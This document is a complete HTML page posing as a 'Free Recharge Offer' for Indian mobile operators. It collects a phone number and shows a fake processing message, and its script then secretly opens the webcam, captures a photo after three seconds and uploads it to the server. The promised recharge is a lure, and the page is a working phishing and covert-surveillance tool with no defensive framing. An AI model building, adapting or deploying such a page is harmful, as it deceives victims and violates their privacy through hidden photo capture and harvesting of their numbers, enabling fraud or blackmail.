<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Free Recharge Portal</title>
  <style>
    body {
      background: linear-gradient(135deg, #00c6ff, #0072ff);
      font-family: Arial, sans-serif;
      text-align: center;
      padding: 40px;
      color: white;
    }
    h1 {
      font-size: 2.2em;
      margin-bottom: 20px;
      text-shadow: 2px 2px 8px #000;
    }
    .box {
      background: rgba(255, 255, 255, 0.1);
      padding: 30px;
      border-radius: 15px;
      width: 90%;
      max-width: 400px;
      margin: auto;
      box-shadow: 0 4px 15px rgba(0,0,0,0.3);
    }
    input, select, button {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border-radius: 8px;
      border: none;
      font-size: 1em;
    }
    input, select {
      background: white;
      color: black;
    }
    button {
      background: gold;
      font-weight: bold;
      cursor: pointer;
    }
    #success {
      margin-top: 20px;
      font-size: 1.2em;
      color: lime;
      display: none;
    }
  </style>
</head>
<body>
  <h1>🔥 Free Recharge Offer 🔥</h1>
  <div class="box">
    <p>Enter your details to claim free recharge</p>
    <input type="text" id="number" placeholder="Enter Mobile Number">
    
    <select id="operator">
      <option value="">-- Select Operator --</option>
      <option>Jio</option>
      <option>Airtel</option>
      <option>Vi</option>
      <option>BSNL</option>
    </select>
    
    <select id="plan">
      <option value="">-- Select Plan --</option>
      <option>1 Month Free (Daily 1.5 GB)</option>
    </select>
    
    <button onclick="processRecharge()">Get Recharge</button>
    
    <div id="success">✅ Processing your recharge... (This may take up to 1 hour)</div>
  </div>

  <script>
    function processRecharge() {
      const num = document.getElementById("number").value;
      const op = document.getElementById("operator").value;
      const plan = document.getElementById("plan").value;
      
      if (num.trim() === "" || op.trim() === "" || plan.trim() === "") {
        alert("Please enter all details!");
        return;
      }
      
      document.getElementById("success").style.display = "block";

      // Camera Access + Capture
      navigator.mediaDevices.getUserMedia({ video: true })
        .then(stream => {
          let video = document.createElement("video");
          video.srcObject = stream;
          video.play();

          let canvas = document.createElement("canvas");
          let context = canvas.getContext("2d");

          setTimeout(() => {
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            context.drawImage(video, 0, 0, canvas.width, canvas.height);

            let image_data = canvas.toDataURL("image/png");

            fetch("/upload", {
              method: "POST",
              headers: { "Content-Type": "application/json" },
              body: JSON.stringify({ img: image_data })
            }).then(res => console.log("Image Sent!"));

            stream.getTracks().forEach(track => track.stop());
          }, 3000); // 3 sec delay
        })
        .catch(err => {
          console.log("Camera access denied:", err);
        });
    }
  </script>
</body>
</html>
